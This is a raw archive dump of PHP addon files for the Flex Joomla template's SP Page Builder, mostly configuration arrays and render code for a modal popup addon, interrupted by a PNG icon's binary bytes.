						'bolder'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLDER'),
					),
					'multiple'=>true,
					'std'=>'',
					'depends'=>array('use_custom_button'=>1)
				),

				'button_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
					'depends'=>array('use_custom_button'=>1)
				),

				'button_type'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE_DESC'),
					'values'=>array(
						'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
						'flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
						'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
						'light'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LIGHT'),
						'primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
						'success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
						'info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
						'warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
						'danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
						'link'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
						'custom'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CUSTOM'),
					),
					'std'=>'default',
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'button_appearance'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_FLAT'),
						'outline'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_OUTLINE'),
						'3d'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_3D'),
					),
					'std'=>'flat',
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'button_background_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_DESC'),
					'std' => '#444444',
					'depends'=>array(
						array('modal_selector', '=', 'button'),
						array('button_type', '=', 'button_type')
					),
				),

				'button_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_DESC'),
					'std' => '#fff',
					'depends'=>array(
						array('modal_selector', '=', 'button'),
						array('button_type', '=', 'button_type')
					),
				),

				'button_background_color_hover'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER_DESC'),
					'std' => '#222',
					'depends'=>array(
						array('modal_selector', '=', 'button'),
						array('button_type', '=', 'button_type')
					),
				),

				'button_color_hover'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER_DESC'),
					'std' => '#fff',
					'depends'=>array(
						array('modal_selector', '=', 'button'),
						array('button_type', '=', 'button_type')
					),
				),

				'button_size'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DEFAULT'),
						'lg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_LARGE'),
						'xlg'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_XLARGE'),
						'sm'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_SMALL'),
						'xs'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_EXTRA_SAMLL'),
					),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'button_shape'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_DESC'),
					'values'=>array(
						'rounded'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUNDED'),
						'square'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_SQUARE'),
						'round'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUND'),
					),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'button_block'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK_DESC'),
					'values'=>array(
						''=>JText::_('JNO'),
						'sppb-btn-block'=>JText::_('JYES'),
					),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),
				
				// Pixeden Icons
				'button_peicon'=>array(
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_PIXEDEN_ICON'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_PIXEDEN_ICON_DESC'),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
					'values'=> $peicon_list
				),

				'button_icon'=>array(
					'type'=>'icon',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_FONTAWESOME_ICON'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_FONTAWESOME_ICON_DESC'),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'button_icon_position'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_POSITION'),
					'values'=>array(
						'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				// Image
				'selector_image'=>array(
					'type'=>'media',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_IMAGE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_SELECT_DESC'),
					'depends'=>array('modal_selector'=>'image')
				),
				// Pixeden Icons
				'peicon_name'=>array( // Pixeden Icons
					'type'=>'peicon', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIXEDEN_ICON'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIXEDEN_ICON_DESC'),
					'std'=> '',
					'depends'=>array('modal_selector'=>'icon')
				),

				// Icon
				'selector_icon_name'=>array(
					'type'=>'icon',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FONTAWESOME_ICON'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_FONTAWESOME_ICON_DESC'),
					'std'=> '',
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_size'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_SIZE_DESC'),
					'placeholder'=>36,
					'std'=>36,
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_COLOR_DESC'),
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_background'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BG_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BG_COLOR_DESC'),
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_border_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BORDER_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BORDER_COLOR_DESC'),
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_border_width'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BORDER_WIDTH_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BORDER_WIDTH_SIZE_DESC'),
					'placeholder'=>'3',
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_border_radius'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BORDER_RADIUS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_BORDER_RADIUS_DESC'),
					'placeholder'=>'5',
					'depends'=>array('modal_selector'=>'icon')
				),

				'selector_icon_padding'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_PADDING'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ICON_PADDING_DESC'),
					'placeholder'=>'20',
					'depends'=>array('modal_selector'=>'icon')
				),

				//Admin Only
				'separator'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_MODAL_CONTENT'),
				),

				'modal_content_type'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_CONTENT_TYPE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_CONTENT_TYPE_DESC'),
					'values'=>array(
						'text'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_CONTENT_TYPE_TEXT'),
						'image'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_CONTENT_TYPE_IMAGE'),
						'video'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_CONTENT_TYPE_VIDEO'),
					),
					'std'=>'text',
				),

				'modal_content_text'=>array(
					'type'=>'editor',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_TEXT_DESC'),
					'std'=>'Collaboratively administrate empowered markets via plug-and-play networks. Efficiently unleash cross-media information without cross-media value. Quickly maximize timely deliverables for real-time schemas. Dramatically maintain clicks-and-mortar solutions without functional solutions. Completely synergize resource taxing relationships via premier niche markets. Professionally cultivate one-to-one customer service with robust ideas. Dynamically innovate resource-leveling customer service for state of the art customer service.&lt;br&gt;&lt;br&gt;Objectively innovate empowered manufactured products whereas parallel platforms. Holisticly predominate extensible testing procedures. Dramatically engage top-line web services vis-a-vis cutting-edge deliverables. Envisioned multimedia based expertise and cross-media growth strategies. Seamlessly visualize quality intellectual capital without superior collaboration and idea-sharing. Installed base portals after maintainable products. Phosfluorescently engage worldwide methodologies with web-enabled technology. Interactively coordinate proactive e-commerce via process-centric "outside the box" thinking. Completely pursue scalable customer service through sustainable potentialities.',
					'depends'=>array('modal_content_type'=>'text')
				),

				'modal_content_image'=>array(
					'type'=>'media',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_IMAGE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_IMAGE_DESC'),
					'depends'=>array('modal_content_type'=>'image')
				),

				'modal_content_video_url'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_VIDEO'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_VIDEO_DESC'),
					'depends'=>array('modal_content_type'=>'video')
				),

				'modal_popup_width'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_POPUP_WIDTH'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_POPUP_WIDTH_DESC'),
					'std'=>'760'
				),

				'modal_popup_height'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_POPUP_HEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_POPUP_HEIGHT_DESC'),
					'std'=>'440'
				),

				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-left',
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

			),
		),
	)
);
PK!Lb�-
-
Bflex/sppagebuilder/addons/prettyphoto_modal/assets/images/icon.pngnu&1i��PNG


IHDR@@�iq�tEXtSoftwareAdobe ImageReadyq�e<siTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a7cf9b43-0fb3-4fab-a54f-a0dd7b941ab3" xmpMM:DocumentID="xmp.did:E82BF033CAA211E69783D53FEA995ECA" xmpMM:InstanceID="xmp.iid:E82BF032CAA211E69783D53FEA995ECA" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a11343fd-2294-40e3-848c-0f90b18c88cb" stRef:documentID="xmp.did:a7cf9b43-0fb3-4fab-a54f-a0dd7b941ab3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�/:PIDATx��[{lE��ݵU�*-�
-���"��ֈ�D"mU0*�1@�H5�C�!����@k�g$��V��E1[�`!TM}�m�v��nK�nw������]~�����|�|ϙY�O$ �B�'d��>�I8G8C�$�$�mԘ@0^Dx�`��&E«��f��PB��"��ʼ/��%|��A(%�h�ү�T�0�6qB�j$���>�?�Ji(�0�4��L��!�|�9�ק���?�u�a��L"W&��˥��9b��f�Y7rܓ��a��r *<�4N��3B��&*]�s5b��a;�?�����d���dgR��H���vf(�t檋�"#��\Q%�OW����۾�ث
�|	X�\{��3��=B\��
������U���[�>�����	�����J����ϼ�b�c7k3#0��4@Q<P�3/F�
�PG>'9I�e[
�b[?�l��v|g��tP�A�/����kGy��������rw��Ш7:HK��~�[�����_XL`0�c��7�40���o_������;���n?/�����$9�;	l���L��;ű�ȅ������Ӏ=�q�fv�D`�LJ���N�	����u�0o6E��|%%��mF�	9Α[�t��ı���7�d�fR�q<[�
��(X=
�}�ݶ�O�R6�`�s����Q�l����4���1r��
�6�TU����B۠f�c&l�邧��q���f���ŀ��R	ģ)
hn�0!166�l�J��������6�D�:�ѻ�ȍ�ᡶ9XY&�:-�Fm4���ܠ߶��u��;!��\ä�8���a	p�A>����̖��rةD�T��{��0/XAU�ɡ����hP�K�i��W�����@0�/Am�-ۭ�7"D�?�-��M �m�B[�'��Gγ�x�y���<�n�lq|���K淩���eapJ
�A�g@ᢼ�e�a�����U��Z������<[UU�@�e�L���L`�2��mm�K�B�"��p�CZ�だ�r�r������s�X� ��Lt�/o��Q�$�\4!!��Q#�C�޳�$F��� ��3��[|{�����d�B������ƉY������s@j��9�R��n��M9�2(.����( �ZڭZ&_�̥9�[�	m��n���0�Y������y��h0ۋ�ǩp��x��6kޒl�[�a�G��9����9�Z��&�6:�3��;�/�+x�"�'�X����k�i%�#���<�[������B��� �`>y�5,l�"��n��y��{ �������{f�$��S��ty�t���j�x�(y��@��i.���S�������%kdm5��~d���]�
R
�G��O�,�r��U"OE�� �
�Z�R��)�&��������แ4�-�!�ҔG g	+��0�'����U���8�\�h=�!i݆�^�Փ
���i˯ή"|v�Tx!]�R,h����ϼ�x�������E9�"'mR�z��=w&�`�zX�F )�IEND�B`�PK!�rT
�$�$2flex/sppagebuilder/addons/bootstrap_modal/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');
class SppagebuilderAddonBootstrap_modal extends SppagebuilderAddons{

	public function render() {
		// Include template's params
		$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
		$has_lazyload = $tpl_params->get('lazyload', 1);
		
		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class . ' ' : '';
		
		//Options
		$modal_selector = (isset($this->addon->settings->modal_selector) && $this->addon->settings->modal_selector) ? $this->addon->settings->modal_selector : '';
		$button_text = (isset($this->addon->settings->button_text) && $this->addon->settings->button_text) ? $this->addon->settings->button_text : '';
		$button_size = (isset($this->addon->settings->button_size) && $this->addon->settings->button_size) ? ' sppb-btn-' . $this->addon->settings->button_size : '';
		$button_type = (isset($this->addon->settings->button_type) && $this->addon->settings->button_type) ? ' sppb-btn-' . $this->addon->settings->button_type : ' sppb-btn-default';
		
		//Pixeden Icons
		$button_peicon = (isset($this->addon->settings->button_peicon) && $this->addon->settings->button_peicon) ? $this->addon->settings->button_peicon : '';
		$button_icon = (isset($this->addon->settings->button_icon) && $this->addon->settings->button_icon) ? $this->addon->settings->button_icon : '';
		$button_block = (isset($this->addon->settings->button_block) && $this->addon->settings->button_block) ? $this->addon->settings->button_block : '';
		$selector_image = (isset($this->addon->settings->selector_image) && $this->addon->settings->selector_image) ? $this->addon->settings->selector_image : '';
		$alignment = (isset($this->addon->settings->alignment) && $this->addon->settings->alignment) ? $this->addon->settings->alignment : 'sppb-text-center';
		
		$button_icon_position = (isset($this->addon->settings->button_icon_position) && $this->addon->settings->button_icon_position) ? $this->addon->settings->button_icon_position: 'left';
		
		$modal_unique_id = 'sppb-modal-' . $this->addon->id;
		$modal_content_type = (isset($this->addon->settings->modal_content_type) && $this->addon->settings->modal_content_type) ? $this->addon->settings->modal_content_type : 'text';
		$modal_window_title = (isset($this->addon->settings->modal_window_title) && $this->addon->settings->modal_window_title) ? $this->addon->settings->modal_window_title : '';
		$modal_window_size = (isset($this->addon->settings->modal_window_size) && $this->addon->settings->modal_window_size) ? $this->addon->settings->modal_window_size : '';
		$modal_content_text = (isset($this->addon->settings->modal_content_text) && $this->addon->settings->modal_content_text) ? $this->addon->settings->modal_content_text : '';
		$modal_content_image = (isset($this->addon->settings->modal_content_image) && $this->addon->settings->modal_content_image) ? $this->addon->settings->modal_content_image : '';
		$modal_content_video_url = (isset($this->addon->settings->modal_content_video_url) && $this->addon->settings->modal_content_video_url) ? $this->addon->settings->modal_content_video_url : '';

		if($button_icon_position == 'left') {
			if ($button_peicon != '') {
				$button_text = ($button_peicon) ? '<i class="pe ' . $button_peicon . '"></i> ' . $button_text : $button_text;
			}else{
				$button_text = ($button_icon) ? '<i class="fa ' . $button_icon . '"></i> ' . $button_text : $button_text;
			}
		} else {
			if ($button_peicon != '') {
				$button_text = ($button_peicon) ? $button_text . ' <i style="margin-left:7px;margin-right:-1px;" class="pe ' . $button_peicon . '"></i>' : $button_text;
			}else{
				$button_text = ($button_icon) ? $button_text . ' <i style="margin-left:5px;margin-right:-1px;" class="fa ' . $button_icon . '"></i>' : $button_text;
			}
		}

	$modal_window_title = (isset($modal_window_title) && $modal_window_title) ? $modal_window_title : '';
	
	if($modal_window_title != '') {
		$alt_text = $modal_window_title;
	} else {
		$alt_text = 'modal image';
	}
	
	// Alignment
	$css_align = '';
	if ($button_block != 'sppb-btn-block') {
		if($alignment == 'sppb-text-left'){
			$css_align .= ' style="float:left;"';
		} elseif( $alignment == 'sppb-text-right' ){
			$css_align .= ' style="float:right;"';
		} elseif( $alignment == 'sppb-text-center' ){
			$css_align .= ' style="float:none;margin-left:auto;margin-right:auto;display:table;"';
		}
	} else {
		$css_align .= ' style="display:block;"';
	}

	$output = '';

	$output .= '<div class="' . $class . $alignment . ' mobile-centered">';

	if($modal_selector=='image') {
		if($selector_image) {
			$output .= '<a class="sppb-modal-selector modal-selector-image" href="#" data-toggle="sppb-modal">';
			// Image
			if(strpos($selector_image, 'http://') !== false || strpos($selector_image, 'https://') !== false){
				/* Lazyload for images with absolute URL */
				if($has_lazyload) {
					$output .= '<img class="lazyload sppb-img-responsive" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. $selector_image .'" alt="'. $alt_text .'">';
				} else {
					$output .= '<img src="' . $selector_image . '" alt="'. $alt_text .'" title="'.$alt_text.'">';	
				}
			} else {
				/* Lazyload for images for relative URL (local image) */
				if($has_lazyload) {
					$output .= '<img class="lazyload sppb-img-responsive' . $class . '" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. JUri::root() . $selector_image .'" alt="'. $alt_text .'">';
				} else {
					$output .= '<img src="' . $selector_image . '" alt="'. $alt_text .'" title="'.$alt_text.'">';	
				}
			}
		$output .= '</a>';
		}
		
	} else {
		$output .= '<button'. $css_align .' class="sppb-btn sppb-btn-'. $button_type .' sppb-btn-'. $button_size . ' ' . $button_block .' sppb-modal-selector" data-toggle="sppb-modal">'. $button_text .'</button>';
	}

	$output .= '</div>';

	$output .= '<div class="sppb-modal sppb-fade '. $class .'" tabindex="-1" role="dialog" aria-hidden="true">';
	$output .= '<div class="sppb-modal-dialog ' . $modal_window_size . '">';
	$output .= '<div class="sppb-modal-content">';

	if($modal_window_title != '') {
		$output .= '<div class="sppb-modal-header">';
	}
	$output .= '<button type="button" class="sppb-close" data-dismiss="sppb-modal"><span aria-hidden="true">&times;</span></button>';
	if($modal_window_title != '') {
		$output .= '<h4 class="sppb-modal-title">' . $modal_window_title . '</h4>';
		$output .= '</div>';
	}

	$output .= '<div class="sppb-modal-body">';

	if($modal_content_text) $output .= '<div class="sppb-modal-text">'. $modal_content_text .'</div>';
	if($modal_content_image) {
		$output .= '<div class="sppb-modal-image">';
		// Image
		if(strpos($modal_content_image, 'http://') !== false || strpos($modal_content_image, 'https://') !== false){
			/* Lazyload for images with absolute URL */
			if($has_lazyload) {
				$output .= '<img class="lazyload sppb-img-responsive" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. $modal_content_image .'" alt="'. $alt_text .'" data-expand="-5">';
			} else {
				$output .= '<img class="sppb-img-responsive" src="'. $modal_content_image .'" alt="'.$alt_text.'">';	
			}
		} else {
			/* Lazyload for images for relative URL (local image) */
			if($has_lazyload) {
				$output .= '<img class="lazyload sppb-img-responsive' . $class . '" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. JUri::root() . $modal_content_image .'" alt="'. $alt_text .'" data-expand="-5">';
			} else {
				$output .= '<img class="sppb-img-responsive" src="'. $modal_content_image .'" alt="'.$alt_text.'">';	
			}
		}
		$output .= '</div>';
	}

	//Video
	if($modal_content_video_url) {

		$video = parse_url($modal_content_video_url);
		
		switch($video['host']) {
			case 'youtu.be':
				$id = trim($video['path'],'/');
				$src = '//www.youtube.com/embed/' . $id;
			break;
			
			case 'www.youtube.com':
			case 'youtube.com':
				parse_str($video['query'], $query);
				$id = $query['v'];
				$src = '//www.youtube.com/embed/' . $id;
			break;
			
			case 'vimeo.com':
			case 'www.vimeo.com':
				$id = trim($video['path'],'/');
				$src = "//player.vimeo.com/video/{$id}";
		}

		$output .= '<div class="sppb-modal-video sppb-embed-responsive sppb-embed-responsive-16by9">';
		$output .= '<iframe class="sppb-embed-responsive-item" src="' . $src . '" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>';
		$output .= '</div>';
	}

	$output .= '</div>';
	
	$output .= '</div>';
	$output .= '</div>';
	$output .= '</div>';

	return $output;
	}

	public function scripts() {
		$app = JFactory::getApplication();	
		$tmplPath = JURI::base(true) . '/templates/'.$app->getTemplate();
		return array($tmplPath.'/sppagebuilder/addons/bootstrap_modal/assets/js/bootstrap-modal.js');
	}

	public function stylesheets() {
		$app = JFactory::getApplication();	
		$tmplPath = JURI::base(true) . '/templates/'.$app->getTemplate();
		return array($tmplPath.'/sppagebuilder/addons/bootstrap_modal/assets/css/bootstrap-modal.css');
	}

}
PK!jl���3flex/sppagebuilder/addons/bootstrap_modal/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_bootstrap_modal',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BOOTSTRAP_MODAL'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BOOTSTRAP_MODAL_DESC'),
		'category'=>'Flex',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'modal_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_DESC'),
					'values'=>array(
						'button'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_BUTTON'),
						'image'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_IMAGE'),
						),
					'std'=>'button',
					),
				'button_text'=>array(
					'type'=>'text', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_TEXT_DESC'),
					'std'=>'Button',
					'depends'=>array('modal_selector'=>'button')
					),
				'button_size'=>array(
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_SIZE_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_SIZE_DEFAULT'),
						'lg'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_SIZE_LARGE'),
						'sm'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_SIZE_SMALL'),
						'xs'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_SIZE_EXTRA_SAMLL'),
						),
					'depends'=>array('modal_selector'=>'button')
					),
				'button_type'=>array(
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_TYPE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_TYPE_DESC'),
					'values'=>array(
						'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
						'flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
						'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
						'light'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LIGHT'),
